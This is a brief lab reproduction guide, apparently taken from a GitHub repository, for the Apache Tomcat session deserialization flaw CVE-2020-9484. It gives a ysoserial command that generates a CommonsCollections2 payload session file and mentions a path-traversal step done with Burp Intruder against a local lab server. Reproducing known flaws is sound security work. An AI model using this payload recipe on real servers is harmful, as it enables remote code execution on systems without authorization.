CVE-2020-9484
Reproduce Apache Tomcat Session deserialization code execution vulnerability with Kali 2.0 CVE-2020-9484
surroundings:
- Kali 2.0
- apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (webapp is s2-053, added commons-collections4-4.0.jar under its lib)
start up
/yourtomcatdir/bin/startup.sh
Generate payload
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
use
First visit S2-053 to see if it starts normally:http://192.168.152.128:8080/s2-053/
Re-access the packet capture and use intruder for path traversal
The command is executed successfully:
https://github.com/IdealDreamLast/CVE-2020-9484/raw/master/img/ok.png
This article is transferred fromhttps://github.com/IdealDreamLast/CVE-2020-9484/